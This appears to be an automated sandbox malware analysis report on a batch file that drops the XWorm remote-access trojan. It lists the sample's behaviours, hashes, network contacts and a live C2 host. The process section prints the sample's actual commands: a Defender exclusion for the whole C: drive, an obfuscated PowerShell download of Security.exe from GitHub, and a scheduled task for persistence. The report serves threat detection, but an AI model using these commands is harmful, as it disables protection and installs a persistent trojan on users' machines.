Malware Analysis Report

2024-11-16 13:35

Sample ID 240526-xf436sga7y
Target SexyBoy.bat
SHA256 9123d299aaf0d551dc6a10b83ae8143586c68279af85fab5e2291993c550179c
Tags
xworm execution persistence rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

9123d299aaf0d551dc6a10b83ae8143586c68279af85fab5e2291993c550179c

Threat Level: Known bad

The file SexyBoy.bat was found to be: Known bad.

Malicious Activity Summary

xworm execution persistence rat trojan

Detect Xworm Payload

Xworm

Downloads MZ/PE file

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-26 18:48

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-26 18:48

Reported

2024-05-26 18:49

Platform

win10-20240404-en

Max time kernel

31s

Max time network

40s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SexyBoy.bat"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Security.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Software\Microsoft\Windows\CurrentVersion\Run\Security = "C:\\Users\\Admin\\AppData\\Roaming\\Security.exe" C:\Users\Admin\AppData\Local\Temp\Security.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Security.exe N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SexyBoy.bat"

C:\Windows\system32\net.exe

NET FILE

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 FILE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Add-MpPreference -ExclusionPath 'C:\'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -NoProfile -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/Proxyonly/wewewewe/raw/main/S"e"cur"i"ty.exe', 'C:\Users\Admin\AppData\Local\Temp\Se"c"urity.exe')"

C:\Users\Admin\AppData\Local\Temp\Security.exe

"C:\Users\Admin\AppData\Local\Temp\Se"c"urity.exe"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Security" /tr "C:\Users\Admin\AppData\Roaming\Security.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 paris-disciplinary.gl.at.ply.gg udp
US 147.185.221.19:63286 paris-disciplinary.gl.at.ply.gg tcp
US 8.8.8.8:53 19.221.185.147.in-addr.arpa udp
US 147.185.221.19:63286 paris-disciplinary.gl.at.ply.gg tcp
US 147.185.221.19:63286 paris-disciplinary.gl.at.ply.gg tcp

Files

memory/4116-0-0x00007FF8E5173000-0x00007FF8E5174000-memory.dmp

memory/4116-5-0x000001D8B1100000-0x000001D8B1122000-memory.dmp

memory/4116-7-0x00007FF8E5170000-0x00007FF8E5B5C000-memory.dmp

memory/4116-9-0x000001D8B12B0000-0x000001D8B1326000-memory.dmp

memory/4116-10-0x00007FF8E5170000-0x00007FF8E5B5C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o05aqsrn.chy.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4116-23-0x00007FF8E5170000-0x00007FF8E5B5C000-memory.dmp

memory/4116-49-0x00007FF8E5170000-0x00007FF8E5B5C000-memory.dmp

memory/4116-50-0x00007FF8E5170000-0x00007FF8E5B5C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 ad5cd538ca58cb28ede39c108acb5785
SHA1 1ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256 c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512 c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

memory/4980-57-0x00007FF8E5170000-0x00007FF8E5B5C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7b1f83ac48cbe6055096e17c831c8241
SHA1 29bbd8eceafbf7dfaab51aeb06e62f8e79385180
SHA256 69ae18fb29c7d6d3c7b0ac41c707509410b693d0174bb929bbe53e167e62cc77
SHA512 84f40c1f902a9f5fa2dbbf0e612a4f452a4f3772dca5b2d98bbe09569ccbf41de6c7b06e93736f73d0b7fcaf4997b41417682a45c3b51b86d8433fb70a25ebf6

memory/4980-60-0x00007FF8E5170000-0x00007FF8E5B5C000-memory.dmp

memory/4980-69-0x00007FF8E5170000-0x00007FF8E5B5C000-memory.dmp

memory/4980-79-0x00007FF8E5170000-0x00007FF8E5B5C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Security.exe

MD5 8cfcf2a8ff7ed19f56c4ba6ad32ff237
SHA1 3bfa32a1a8f738a8390fb029c098d6db43f000ee
SHA256 55de204273cd069d114a5928de0af46b93bde9b437bd01ae10c443d48aba1276
SHA512 46b4933efeff1075c1b629c1c00f077c9a5ffc0ba0cdd01ad393be31064c65e75982988153fe0a393c3519c3a922292efc369826e32bac9aa96a0cce7de2d2cb

memory/3144-83-0x0000000000EC0000-0x0000000000ED6000-memory.dmp